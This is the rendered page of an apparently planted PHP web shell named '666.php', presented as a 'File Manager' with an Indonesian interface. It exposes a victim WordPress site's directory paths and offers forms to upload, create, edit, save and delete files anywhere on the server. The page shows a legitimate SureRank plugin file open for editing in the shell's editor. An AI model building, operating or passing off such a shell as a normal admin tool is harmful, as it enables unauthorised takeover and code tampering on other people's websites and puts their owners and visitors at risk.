??????????????
                          ??????????????
??????????????
??????????????
<br />
<b>Warning</b>:  Undefined variable $auth in <b>/home/u627560552/domains/kovexadvisory.com/public_html/666.php</b> on line <b>546</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on value of type null in <b>/home/u627560552/domains/kovexadvisory.com/public_html/666.php</b> on line <b>546</b><br />
??????????????
??????????????
??????????????
??????????????


<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>File Manager</title>
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;600&family=Syne:wght@400;700;800&display=swap" rel="stylesheet">
<style>
*,*::before,*::after{box-sizing:border-box;margin:0;padding:0}
:root{
  --bg:#0d0f14;--bg2:#13161e;--bg3:#1a1e28;--border:#252935;
  --green:#00e5a0;--text:#e2e6f0;--muted:#6b7280;
  --red:#ff4f5e;--yellow:#fbbf24;--blue:#60a5fa;
  --mono:'JetBrains Mono',monospace;--sans:'Syne',sans-serif;
}
html,body{height:100%}
body{font-family:var(--sans);background:var(--bg);color:var(--text);display:flex;flex-direction:column;min-height:100vh}
a{text-decoration:none}

header{display:flex;align-items:center;gap:12px;padding:13px 22px;background:var(--bg2);border-bottom:1px solid var(--border);position:sticky;top:0;z-index:50;flex-wrap:wrap}
.logo{font-weight:800;font-size:1.05rem;color:var(--green);letter-spacing:-.5px;white-space:nowrap}
.pathbar{font-family:var(--mono);font-size:.74rem;color:var(--muted);flex:1;word-break:break-all}
.pathbar span{color:var(--green);font-weight:700}

.wrap{display:flex;flex:1;overflow:hidden}

aside{width:255px;flex-shrink:0;background:var(--bg2);border-right:1px solid var(--border);overflow-y:auto;padding:14px 0}
.sec{padding:0 11px 14px;border-bottom:1px solid var(--border);margin-bottom:3px}
.sec:last-child{border-bottom:none}
.sec-label{font-size:.63rem;font-weight:700;letter-spacing:1.5px;text-transform:uppercase;color:var(--muted);padding:3px 3px 9px}
.form-col{display:flex;flex-direction:column;gap:8px}
.lbl{font-size:.7rem;color:var(--muted);font-weight:600;display:block;margin-bottom:3px}
input[type=text],textarea{width:100%;background:var(--bg);border:1px solid var(--border);border-radius:5px;color:var(--text);font-family:var(--mono);font-size:.78rem;padding:7px 9px;outline:none;transition:.15s}
input[type=text]:focus,textarea:focus{border-color:var(--green)}
textarea{resize:vertical;min-height:80px}
.btn{display:flex;align-items:center;justify-content:center;gap:5px;padding:8px 13px;border-radius:5px;border:none;font-family:var(--sans);font-weight:700;font-size:.76rem;cursor:pointer;width:100%;transition:.15s}
.btn-green{background:var(--green);color:#000}
.btn-green:hover{filter:brightness(1.1)}
.btn-outline{background:transparent;border:1px solid var(--border);color:var(--text)}
.btn-outline:hover{border-color:var(--green);color:var(--green)}
.btn-blue{background:rgba(96,165,250,.12);border:1px solid rgba(96,165,250,.35);color:var(--blue)}
.btn-blue:hover{background:rgba(96,165,250,.2)}
.btn-red{background:rgba(255,79,94,.12);border:1px solid rgba(255,79,94,.35);color:var(--red)}
.btn-red:hover{background:rgba(255,79,94,.2)}

.upzone{border:2px dashed var(--border);border-radius:8px;padding:18px 10px;text-align:center;cursor:pointer;position:relative;transition:.2s}
.upzone:hover,.upzone.drag{border-color:var(--green);background:rgba(0,229,160,.04)}
.upzone input{position:absolute;inset:0;opacity:0;cursor:pointer;width:100%;height:100%}
.upzone .ico{font-size:1.5rem;margin-bottom:5px}
.upzone strong{font-size:.78rem}
.upzone small{display:block;color:var(--muted);font-size:.69rem;margin-top:3px}
#flist{font-family:var(--mono);font-size:.7rem;color:var(--green);max-height:65px;overflow-y:auto;margin-top:4px}

main{flex:1;overflow-y:auto;padding:18px 22px;display:flex;flex-direction:column;gap:13px}
.bar{display:flex;align-items:center;justify-content:space-between;gap:10px;flex-wrap:wrap}
.bar-left{display:flex;align-items:center;gap:8px;flex-wrap:wrap}
.count{font-family:var(--mono);font-size:.72rem;color:var(--muted)}

.back-link{display:inline-flex;align-items:center;gap:5px;padding:5px 11px;background:var(--bg3);border:1px solid var(--border);border-radius:5px;color:var(--muted);font-size:.75rem;font-weight:700;transition:.15s;white-space:nowrap}
.back-link:hover{color:var(--green);border-color:var(--green)}

#q{background:var(--bg2);border:1px solid var(--border);border-radius:5px;color:var(--text);font-family:var(--mono);font-size:.78rem;padding:6px 11px;width:190px;outline:none;transition:.15s}
#q:focus{border-color:var(--green)}

.tbl{width:100%;border-collapse:collapse;font-size:.83rem}
.tbl th{text-align:left;padding:7px 11px;font-size:.65rem;text-transform:uppercase;letter-spacing:1px;color:var(--muted);border-bottom:1px solid var(--border);font-weight:700;background:var(--bg);position:sticky;top:0;z-index:5}
.tbl td{padding:9px 11px;border-bottom:1px solid rgba(37,41,53,.5);vertical-align:middle}
.tbl tr:last-child td{border-bottom:none}
.tbl tr:hover td{background:var(--bg2)}
.fname a{color:var(--text);font-weight:600;display:flex;align-items:center;gap:5px;transition:.15s}
.fname a:hover{color:var(--green)}
.fname.isdir a{color:var(--yellow)}
.fname.isdir a:hover{color:#fff}
.fic{margin-right:2px}
.meta{font-family:var(--mono);font-size:.7rem;color:var(--muted)}
.tag{display:inline-block;padding:1px 7px;border-radius:20px;font-size:.63rem;font-weight:700;letter-spacing:.3px;text-transform:uppercase}
.tag-d{background:rgba(251,191,36,.12);color:var(--yellow)}
.tag-f{background:rgba(0,229,160,.08);color:var(--green)}

.alert{display:flex;align-items:center;gap:9px;padding:9px 14px;border-radius:8px;font-size:.8rem;font-weight:600;animation:si .25s ease}
@keyframes si{from{opacity:0;transform:translateY(-5px)}to{opacity:1}}
.alert-ok{background:rgba(0,229,160,.1);border:1px solid rgba(0,229,160,.25);color:var(--green)}
.alert-err{background:rgba(255,79,94,.1);border:1px solid rgba(255,79,94,.25);color:var(--red)}

.empty{text-align:center;padding:55px 20px;color:var(--muted)}
.empty-ico{font-size:2.2rem;margin-bottom:8px}

.actions{display:flex;align-items:center;gap:6px;flex-wrap:wrap}
.action-link,.action-btn{
  display:inline-flex;align-items:center;justify-content:center;
  padding:5px 10px;border-radius:6px;font-size:.7rem;font-weight:700;
  border:1px solid var(--border);background:var(--bg3);color:var(--text);
  cursor:pointer;font-family:var(--sans);text-decoration:none;
}
.action-link:hover,.action-btn:hover{border-color:var(--green);color:var(--green)}
.action-btn.red{border-color:rgba(255,79,94,.3);color:var(--red)}
.action-btn.red:hover{background:rgba(255,79,94,.08)}
.action-link.blue{border-color:rgba(96,165,250,.3);color:var(--blue)}
.action-link.blue:hover{background:rgba(96,165,250,.08)}

.editor-wrap{
  background:var(--bg2);
  border:1px solid var(--border);
  border-radius:10px;
  overflow:hidden;
}
.editor-head{
  display:flex;align-items:center;justify-content:space-between;gap:10px;
  padding:12px 14px;border-bottom:1px solid var(--border);flex-wrap:wrap
}
.editor-title{font-size:.85rem;font-weight:700;color:var(--green);word-break:break-all}
.editor-body{padding:14px}
.editor-body textarea{
  width:100%;min-height:420px;border-radius:8px;
  background:#0a0c10;color:#dbe7ff;border:1px solid var(--border);
  padding:14px;font-size:.78rem;line-height:1.55
}
.editor-actions{display:flex;gap:8px;flex-wrap:wrap;margin-top:10px}

@media(max-width:700px){
  .wrap{flex-direction:column}
  aside{width:100%;border-right:none;border-bottom:1px solid var(--border)}
  main{padding:12px}
}
</style>
</head>
<body>

<header>
  <div class="logo">📂 FileMgr</div>
  <div class="pathbar">📍 <span>/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax</span></div>
</header>

<div class="wrap">
<aside>

  <div class="sec">
    <div class="sec-label">Upload File</div>
    <form method="post" enctype="multipart/form-data" class="form-col">
      <input type="hidden" name="act" value="up">
      <div class="upzone" id="dz">
        <div class="ico">📤</div>
        <strong>Drop file di sini</strong>
        <small>atau klik untuk pilih</small>
        <input type="file" name="f[]" multiple id="fi">
      </div>
      <div id="flist"></div>
      <button type="submit" class="btn btn-green">Upload</button>
    </form>
  </div>

  <div class="sec">
    <div class="sec-label">Buat Folder</div>
    <form method="post" class="form-col">
      <input type="hidden" name="act" value="md">
      <div>
        <label class="lbl">Nama Folder</label>
        <input type="text" name="n" placeholder="nama-folder" required>
      </div>
      <button type="submit" class="btn btn-outline">📁 Buat Folder</button>
    </form>
  </div>

  <div class="sec">
    <div class="sec-label">Buat File Baru</div>
    <form method="post" class="form-col">
      <input type="hidden" name="act" value="nf">
      <div>
        <label class="lbl">Nama File</label>
        <input type="text" name="n" placeholder="file.txt" required>
      </div>
      <div>
        <label class="lbl">Isi (opsional)</label>
        <textarea name="c" placeholder="Konten file..."></textarea>
      </div>
      <button type="submit" class="btn btn-outline">📄 Buat File</button>
    </form>
  </div>

</aside>

<main>
    
      <div class="editor-wrap">
      <div class="editor-head">
        <div class="editor-title">✏️ Edit File: /home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/save-endpoints.php</div>
        <a href="?d=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax" class="back-link">⬅ Kembali</a>
      </div>
      <div class="editor-body">
        <form method="post">
          <input type="hidden" name="act" value="savefile">
          <input type="hidden" name="target" value="/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/save-endpoints.php">
          <textarea name="content">&lt;?php
/**
 * AJAX fallback handlers for SureRank&#039;s save endpoints.
 *
 * When WP Ghost or a WAF rewrites / blocks `/wp-json/`, the REST endpoints
 * in inc/api/post.php, inc/api/term.php, and inc/api/admin.php return 403
 * or non-JSON responses. The JS middleware registered in
 * src/functions/api-fetch-middleware.js detects those failure modes and
 * retries the same payload against the AJAX actions below. Both transports
 * delegate to the same transport-free helpers (Post::save_post_seo_meta,
 * Term::save_term_seo_meta, Admin::save_admin_settings) so they produce
 * identical side effects for identical input. See #2362.
 *
 * Auth parity with REST:
 * - Nonce: `wp_rest` (same as api-fetch&#039;s X-WP-Nonce), passed as `_wpnonce`.
 * - Permission chain: Api_Base::check_permission_for_action() — runs the
 *   exact same `surerank_rest_api_permission` +
 *   `surerank_rest_api_permission_check` filters the REST endpoints do, so
 *   a Pro license / role policy that would deny the REST call also denies
 *   the AJAX fallback.
 * - Sanitisation: Sanitize::array_deep + sanitize_with_placeholders (same
 *   sanitiser the REST endpoints apply via their route args).
 *
 * @package SureRank\Inc\Ajax
 * @since 1.7.2
 */

namespace SureRank\Inc\Ajax;

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit; // Exit if accessed directly.
}

use SureRank\Inc\API\Admin;
use SureRank\Inc\API\Api_Base;
use SureRank\Inc\API\Post;
use SureRank\Inc\API\Term;
use SureRank\Inc\API\User_Seo;
use SureRank\Inc\Functions\Rest_Observation;
use SureRank\Inc\Functions\Sanitize;
use SureRank\Inc\Traits\Get_Instance;
use WP_REST_Request;

/**
 * Save endpoints AJAX fallback class.
 *
 * @since 1.7.2
 */
class Save_Endpoints {

	use Get_Instance;

	/**
	 * Nonce action mirrored from api-fetch (X-WP-Nonce is a `wp_rest`
	 * nonce). Using the same action lets clients reuse the single nonce
	 * already localised for REST without requiring a second round-trip.
	 */
	private const NONCE_ACTION = &#039;wp_rest&#039;;

	/**
	 * Constructor: register the AJAX hooks.
	 *
	 * @since 1.7.2
	 */
	public function __construct() {
		add_action( &#039;wp_ajax_surerank_save_post_settings&#039;, [ $this, &#039;save_post_settings&#039; ] );
		add_action( &#039;wp_ajax_surerank_save_term_settings&#039;, [ $this, &#039;save_term_settings&#039; ] );
		add_action( &#039;wp_ajax_surerank_save_user_settings&#039;, [ $this, &#039;save_user_settings&#039; ] );
		add_action( &#039;wp_ajax_surerank_save_admin_settings&#039;, [ $this, &#039;save_admin_settings&#039; ] );
	}

	/**
	 * AJAX handler for POST /wp-json/surerank/v1/post/settings parity.
	 *
	 * @since 1.7.2
	 * @return void
	 */
	public function save_post_settings(): void {
		if ( ! $this-&gt;guard_request( &#039;POST&#039;, &#039;/surerank/v1/post/settings&#039; ) ) {
			return;
		}

		// phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce verified in guard_request() above.
		$post_id = isset( $_POST[&#039;post_id&#039;] ) ? absint( wp_unslash( $_POST[&#039;post_id&#039;] ) ) : 0;
		if ( $post_id &lt;= 0 ) {
			wp_send_json_error(
				[
					&#039;success&#039; =&gt; false,
					&#039;message&#039; =&gt; __( &#039;Invalid post id.&#039;, &#039;surerank&#039; ),
				],
				400
			);
		}

		$meta_data = $this-&gt;extract_meta_data();

		$result = Post::save_post_seo_meta( $post_id, $meta_data );

		$this-&gt;respond_with( $result );
	}

	/**
	 * AJAX handler for POST /wp-json/surerank/v1/term/settings parity.
	 *
	 * @since 1.7.2
	 * @return void
	 */
	public function save_term_settings(): void {
		if ( ! $this-&gt;guard_request( &#039;POST&#039;, &#039;/surerank/v1/term/settings&#039; ) ) {
			return;
		}

		// phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce verified in guard_request() above.
		$term_id = isset( $_POST[&#039;term_id&#039;] ) ? absint( wp_unslash( $_POST[&#039;term_id&#039;] ) ) : 0;
		if ( $term_id &lt;= 0 ) {
			wp_send_json_error(
				[
					&#039;success&#039; =&gt; false,
					&#039;message&#039; =&gt; __( &#039;Invalid term id.&#039;, &#039;surerank&#039; ),
				],
				400
			);
		}

		$meta_data = $this-&gt;extract_meta_data();

		$result = Term::save_term_seo_meta( $term_id, $meta_data );

		$this-&gt;respond_with( $result );
	}

	/**
	 * AJAX handler for POST /wp-json/surerank/v1/user/settings parity.
	 *
	 * @since 1.9.0
	 * @return void
	 */
	public function save_user_settings(): void {
		if ( ! $this-&gt;guard_request( &#039;POST&#039;, &#039;/surerank/v1/user/settings&#039; ) ) {
			return;
		}

		// phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce verified in guard_request() above.
		$user_id = isset( $_POST[&#039;user_id&#039;] ) ? absint( wp_unslash( $_POST[&#039;user_id&#039;] ) ) : 0;
		if ( $user_id &lt;= 0 || ! User_Seo::can_manage_user_seo( $user_id ) ) {
			wp_send_json_error(
				[
					&#039;success&#039; =&gt; false,
					&#039;message&#039; =&gt; __( &#039;Invalid user id.&#039;, &#039;surerank&#039; ),
				],
				400
			);
		}

		$meta_data = $this-&gt;extract_meta_data();

		$result = User_Seo::save_user_seo_meta( $user_id, $meta_data );

		$this-&gt;respond_with( $result );
	}

	/**
	 * AJAX handler for POST /wp-json/surerank/v1/admin/global-settings parity.
	 *
	 * @since 1.7.2
	 * @return void
	 */
	public function save_admin_settings(): void {
		if ( ! $this-&gt;guard_request( &#039;POST&#039;, &#039;/surerank/v1/admin/global-settings&#039; ) ) {
			return;
		}

		// phpcs:ignore WordPress.Security.NonceVerification.Missing,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- Nonce verified in guard_request() above; raw body is sanitised via Sanitize::array_deep below before use.
		$raw_data = isset( $_POST[&#039;data&#039;] ) ? wp_unslash( $_POST[&#039;data&#039;] ) : &#039;&#039;;
		$data     = is_string( $raw_data ) ? json_decode( $raw_data, true ) : $raw_data;

		if ( ! is_array( $data ) ) {
			$data = [];
		}

		/**
		 * Sanitized settings payload.
		 *
		 * @var array&lt;string, mixed&gt; $data
		 */
		$data = Sanitize::sanitize_request_data( $data );

		$result = Admin::save_admin_settings( $data );

		$this-&gt;respond_with( $result );
	}

	/**
	 * Verify the request arrived via AJAX with a valid nonce AND
	 * satisfies the exact same permission chain as the mirrored REST
	 * endpoint. On failure, emits a structured JSON error and returns
	 * false; callers must early-return.
	 *
	 * A synthetic WP_REST_Request is built so Pro plugins hooking
	 * `surerank_rest_api_permission` / `surerank_rest_api_permission_check`
	 * get the same route context they see on the REST side.
	 *
	 * @param string $method       HTTP method the mirrored REST route uses (e.g., &#039;POST&#039;).
	 * @param string $rest_route   REST route path, including namespace, e.g. &#039;/surerank/v1/post/settings&#039;.
	 * @since 1.7.2
	 * @return bool True on success, false on failure (with response already sent).
	 */
	private function guard_request( string $method, string $rest_route ): bool {
		// Nonce check — use die=false so nonce failures emit structured
		// JSON instead of `wp_die(&quot;-1&quot;)`, which the JS middleware cannot
		// parse and would misreport as a firewall block.
		if ( false === check_ajax_referer( self::NONCE_ACTION, &#039;_wpnonce&#039;, false ) ) {
			wp_send_json_error(
				[
					&#039;success&#039; =&gt; false,
					&#039;code&#039;    =&gt; &#039;nonce_invalid&#039;,
					&#039;message&#039; =&gt; __( &#039;Your session has expired. Please refresh and try again.&#039;, &#039;surerank&#039; ),
				],
				401
			);
		}

		$request = new WP_REST_Request( $method, $rest_route );
		// phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce verified above.
		$request-&gt;set_body_params( wp_unslash( $_POST ) );

		$permission = Api_Base::check_permission_for_action( $request );
		if ( is_wp_error( $permission ) ) {
			$error_data = $permission-&gt;get_error_data();
			$status     = is_array( $error_data ) &amp;&amp; isset( $error_data[&#039;status&#039;] ) ? (int) $error_data[&#039;status&#039;] : 403;
			wp_send_json_error(
				[
					&#039;success&#039; =&gt; false,
					&#039;code&#039;    =&gt; $permission-&gt;get_error_code(),
					&#039;message&#039; =&gt; $permission-&gt;get_error_message(),
				],
				$status
			);
		}

		// Reaching this handler proves the JS middleware fell back from
		// REST to AJAX — record that REST is currently blocked so
		// Site Health can surface it.
		Rest_Observation::mark_blocked();

		return true;
	}

	/**
	 * Read and sanitise the `metaData` field from the AJAX request body,
	 * applying the same sanitiser the REST endpoints use.
	 *
	 * API-fetch posts JSON bodies, which the middleware re-encodes as
	 * form data before retrying against admin-ajax.php, so the value
	 * arrives as either a nested array (form-encoded) or a JSON string
	 * depending on the client&#039;s retry shape. Handle both.
	 *
	 * @since 1.7.2
	 * @return array&lt;string, mixed&gt;
	 */
	private function extract_meta_data(): array {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- Nonce verified in guard_request(); raw value is sanitised via Sanitize::sanitize_request_data() below before use.
		$raw = isset( $_POST[&#039;metaData&#039;] ) ? wp_unslash( $_POST[&#039;metaData&#039;] ) : [];

		if ( is_string( $raw ) ) {
			$decoded = json_decode( $raw, true );
			$raw     = is_array( $decoded ) ? $decoded : [];
		}

		if ( ! is_array( $raw ) ) {
			$raw = [];
		}

		/**
		 * Sanitized meta payload.
		 *
		 * @var array&lt;string, mixed&gt; $sanitised
		 */
		$sanitised = Sanitize::sanitize_request_data( $raw );
		return $sanitised;
	}

	/**
	 * Emit a JSON response that matches the shape produced by
	 * Send_Json::success / Send_Json::error on the REST side, so the
	 * JS middleware sees identical payloads across transports.
	 *
	 * @param array{success: bool, message: string} $result Result from the shared save helper.
	 * @since 1.7.2
	 * @return void
	 */
	private function respond_with( array $result ): void {
		$payload = [
			&#039;success&#039; =&gt; (bool) $result[&#039;success&#039;],
			&#039;message&#039; =&gt; (string) $result[&#039;message&#039;],
		];

		if ( $payload[&#039;success&#039;] ) {
			wp_send_json_success( $payload );
		}

		wp_send_json_error( $payload );
	}
}
</textarea>
          <div class="editor-actions">
            <button type="submit" class="btn btn-green" style="width:auto">💾 Simpan File</button>
            <a href="?d=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax" class="action-link">Batal</a>
          </div>
        </form>
      </div>
    </div>
  
  <div class="bar">
    <div class="bar-left">
              <a href="?d=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc" class="back-link">⬅ Naik ke inc</a>
            <span class="count">2 item</span>
    </div>
    <input type="text" id="q" placeholder="Cari file..." oninput="cari(this.value)">
  </div>

    <table class="tbl" id="tbl">
    <thead>
      <tr>
        <th style="width:38%">Nama</th>
        <th>Tipe</th>
        <th>Ukuran</th>
        <th>Diubah</th>
        <th style="width:190px">Aksi</th>
      </tr>
    </thead>
    <tbody>
    
          <tr>
        <td class="fname">
          <span style="display:flex;align-items:center;gap:5px">
            <span class="fic">🐘</span>ajax.php          </span>
        </td>
        <td><span class="tag tag-f">php</span></td>
        <td class="meta">3.2 KB</td>
        <td class="meta">2026-06-21 06:40</td>
        <td>
          <div class="actions">
            <a href="?edit=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax%2Fajax.php&d=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax" class="action-link blue">✏️ Edit</a>
            <a href="/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/ajax.php" class="action-link" target="_blank">👁️ View</a>
            <form method="post" style="display:inline" onsubmit="return confirm('Yakin hapus file ini?')">
              <input type="hidden" name="act" value="del">
              <input type="hidden" name="target" value="/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/ajax.php">
              <button type="submit" class="action-btn red">🗑 Hapus</button>
            </form>
          </div>
        </td>
      </tr>
          <tr>
        <td class="fname">
          <span style="display:flex;align-items:center;gap:5px">
            <span class="fic">🐘</span>save-endpoints.php          </span>
        </td>
        <td><span class="tag tag-f">php</span></td>
        <td class="meta">9.4 KB</td>
        <td class="meta">2026-06-21 06:40</td>
        <td>
          <div class="actions">
            <a href="?edit=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax%2Fsave-endpoints.php&d=%2Fhome%2Fmklsvubc%2Fam1atec.co.uk%2Fwp-content%2Fplugins%2Fsurerank%2Finc%2Fajax" class="action-link blue">✏️ Edit</a>
            <a href="/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/save-endpoints.php" class="action-link" target="_blank">👁️ View</a>
            <form method="post" style="display:inline" onsubmit="return confirm('Yakin hapus file ini?')">
              <input type="hidden" name="act" value="del">
              <input type="hidden" name="target" value="/home/mklsvubc/am1atec.co.uk/wp-content/plugins/surerank/inc/ajax/save-endpoints.php">
              <button type="submit" class="action-btn red">🗑 Hapus</button>
            </form>
          </div>
        </td>
      </tr>
        </tbody>
  </table>
  </main>
</div>

<script>
var dz = document.getElementById('dz');
var fi = document.getElementById('fi');
var fl = document.getElementById('flist');

function showF(files) {
  fl.innerHTML = Array.from(files).map(function(f) {
    return '<div>📄 ' + f.name + '</div>';
  }).join('');
}

fi.addEventListener('change', function() { showF(fi.files); });

dz.addEventListener('dragover', function(e) {
  e.preventDefault();
  dz.classList.add('drag');
});

dz.addEventListener('dragleave', function() {
  dz.classList.remove('drag');
});

dz.addEventListener('drop', function(e) {
  e.preventDefault();
  dz.classList.remove('drag');
  if (e.dataTransfer.files.length) {
    try {
      var dt = new DataTransfer();
      Array.from(e.dataTransfer.files).forEach(function(f) {
        dt.items.add(f);
      });